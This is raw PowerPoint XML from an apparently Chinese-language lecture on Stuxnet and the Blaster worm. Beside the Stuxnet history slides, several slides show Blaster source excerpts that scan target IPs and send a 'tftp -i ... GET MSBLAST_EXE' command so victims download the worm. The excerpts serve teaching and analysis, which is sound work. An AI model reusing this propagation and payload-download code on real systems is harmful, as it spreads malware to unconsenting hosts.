                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="56" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4710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D4B001AF-7BF2-4515-820D-A0BBFC948DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F37AD69-F668-4245-A470-433922FA4A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这是第一个直接破坏现实世界中工业基础设施的恶意代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>据赛门铁克公司的统计，当时全球已有约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>45000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>个网络被该蠕虫感染，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>60%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>的受害主机位于伊朗境内。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>伊朗政府已经确认该国布什尔核电站遭到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>蠕虫的攻击。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106500" name="Picture 5" descr="1285644252337">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7BCF99-02A2-4594-9259-0461A631B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7512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B5F928DF-38A3-46C1-8C4E-F221C1D770E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传播方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107523" name="Picture 4" descr="03">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D0067E-215A-4BC4-8020-6397CB0176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1844675"/>
            <a:ext cx="729615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BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="0"/>
            <a:ext cx="7808912" cy="7029400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>&lt;20; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>blaster_increment_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>target_ip_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>.%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>.%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>.%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ClassA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ClassB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ClassC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ClassD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>inet_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>target_ip_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> == -1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>    return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sin.sin_addr.s_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  connect(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sockarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>],(struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>*)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sin,sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(sin));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3232618161"/>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BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="0"/>
            <a:ext cx="7808912" cy="7029400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>cmdstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> %s GET %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>target_ip_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, MSBLAST_EXE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>if (send(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>cmdstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>cmdstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>), 0) &lt;= 0)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>closesocket_and_return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18484855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10A423D-377F-4E52-BBB7-B5A526BDF26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C17162-DF5A-4217-9E1A-20E515F195E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>专门攻击工业系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用多个零日漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用数字签名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 明确的攻击目标</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伊朗核设施</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这是一次精心策划的攻击！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FF3256-5EEF-4823-9B0B-AE164E3023BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RealTek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的数字签名以躲避杀毒软件的查杀。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101381" name="Picture 5" descr="图11 Stuxnet使用的数字签名">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D166D9-3A3F-4D3A-A2C6-77E1A1C18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2924175"/>
            <a:ext cx="3614737"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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B41DCA70-FDEC-4340-A56A-5EE5ED7DD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55938"/>
            <a:ext cx="5000625" cy="3802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01382"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101382"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="101381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
